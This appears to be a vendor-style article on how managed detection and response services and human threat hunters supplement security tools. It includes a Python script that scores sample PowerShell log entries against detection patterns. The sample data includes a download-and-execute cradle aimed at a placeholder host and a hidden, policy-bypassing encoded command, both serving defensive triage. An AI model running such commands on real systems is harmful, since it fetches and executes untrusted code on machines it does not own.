October 20, 2022
How Managed Detection and Response Services Bolster Cyberdefences
A partner with advanced threat-hunting capabilities can augment internal tools and teams.
As hackers evolve their tactics, security tools alone aren’t enough
It’s tempting to believe your defences are secure if you deploy an arsenal of advanced security solutions. Unfortunately, many organizations don’t fully appreciate that security tools alone aren’t always enough.
At this point, most endpoint protection tools are effective at detecting known threats. When they encounter a situation they’ve seen before, they can take action against it without human intervention. In other cases, a tool can detect a threat and block the initial instance, but someone still needs to investigate to ensure the rest of the environment remains secure.
The problem is that attackers know how security tools function, and they know how to evade detection. Increasingly, adversaries are launching “living off the land” attacks in which they take advantage of legitimate tools to exploit vulnerabilities.
One of the most common techniques is the malicious use of PowerShell. No matter how good security tools are, they can’t distinguish between malicious and legitimate uses of PowerShell. The best they can do is to flag activity that might indicate an attacker, prompting a human to investigate the potential threat and determine what action is needed.
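The flag-then-investigate behaviour described above can be illustrated with a small triage routine. The following is an added example, not code from the original article or from any MDR vendor: it scans a few constructed PowerShell script-block log entries (in the style of Windows Event ID 4104 records) for traits commonly associated with misuse, scores them, and hands anything that crosses a threshold to a human rather than deciding on its own. The pattern names, threshold, sample users and sample scripts are all assumptions made for the example.

```python
"""
Added example (not from the original article): a minimal PowerShell
script-block triage helper. It never "blocks"; it only decides whether an
entry deserves an analyst's attention, which is the limit of what a tool can
do when legitimate and malicious PowerShell look alike.
"""
import re
from dataclasses import dataclass

# Indicators frequently cited in detection guidance for PowerShell misuse.
# None of them is proof of an attack on its own: administrators legitimately
# download installers and run encoded commands, so a single hit is noise.
SUSPICIOUS_PATTERNS = {
    "encoded_command": re.compile(r"-(?:e|enc|encodedcommand)\b", re.I),
    "download_cradle": re.compile(
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-ExecutionPolicy\s+bypass", re.I),
}

# Constructed sample records; user names, paths and scripts are invented.
SAMPLE_LOG = [
    {"id": 1, "user": "CORP\\admin.jane",
     "script": "Get-Service | Where-Object Status -eq 'Running' "
               "| Export-Csv C:\\reports\\services.csv"},
    {"id": 2, "user": "CORP\\admin.jane",
     "script": "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi "
               "-OutFile C:\\temp\\agent.msi"},
    {"id": 3, "user": "CORP\\svc-backup",
     "script": "powershell.exe -w hidden -ExecutionPolicy Bypass "
               "-EncodedCommand <base64-placeholder>"},
    {"id": 4, "user": "CORP\\helpdesk01",
     "script": "IEX (New-Object Net.WebClient).DownloadString("
               "'http://<untrusted-host-placeholder>/x')"},
]


@dataclass
class Finding:
    record_id: int
    user: str
    score: int
    matched: list
    verdict: str


def score_script_block(text):
    """Return (score, matched_pattern_names) for one script-block text."""
    matched = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    return len(matched), matched


def triage(log_entries, review_threshold=2):
    """Classify each entry. Anything at or above the threshold is escalated
    to a person; the tool deliberately stops short of a block decision."""
    findings = []
    for entry in log_entries:
        score, matched = score_script_block(entry["script"])
        if score >= review_threshold:
            verdict = "escalate-to-analyst"
        elif score == 1:
            verdict = "log-only"   # plausible admin activity; keep for hunting
        else:
            verdict = "benign"
        findings.append(Finding(entry["id"], entry["user"], score, matched, verdict))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"record {f.record_id} ({f.user}): {f.verdict} "
              f"score={f.score} matched={f.matched}")
```

Record 2 shows why a human is needed: an installer download by an administrator trips one indicator and is logged, not escalated, while records 3 and 4 combine several indicators and are queued for an analyst. The "log-only" tier is what a threat hunter later sweeps through looking for activity that slipped under the threshold.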
Another common scenario is that an attacker does something new in the environment that the security tool hasn’t encountered before. Once again, the tool can’t take action, so human intervention is needed.
MDR services address these vulnerabilities through an ongoing process of threat hunting. A security analyst who knows how to think like an attacker continually looks for threats that have evaded detection by security tools. When a tool encounters a new attack type or new suspicious behaviour, the analyst is the last line of defence.
Organizations struggle to acquire true threat-hunting expertise
The increasing sophistication of hackers isn’t the only reason to adopt MDR. Another common motivation is the need to address a talent gap. Many organizations find it difficult to hire cybersecurity professionals who can use security tools effectively. Even organizations that manage to hire security professionals find that they may not have all the specialized capabilities needed to engage in threat hunting. In addition, as attackers have become more sophisticated, so have security tools — which means there are even fewer people equipped to use them effectively.
Some organizations adopt MDR in the wake of a breach. They’ve experienced it once and want to ensure it does not happen again. Organizations undergoing fast growth may invest in MDR proactively. They know that as they grow, they’ll collect and produce more data, and they want to minimize the security vulnerabilities associated with data sprawl.
For many organizations, the decision comes down to which threats are the most significant for their environments, which tools they need to optimize their visibility and where capability gaps prevent them from deriving full value from those tools. MDR is proving to be an essential defence for organizations that want to stay one step ahead of attackers.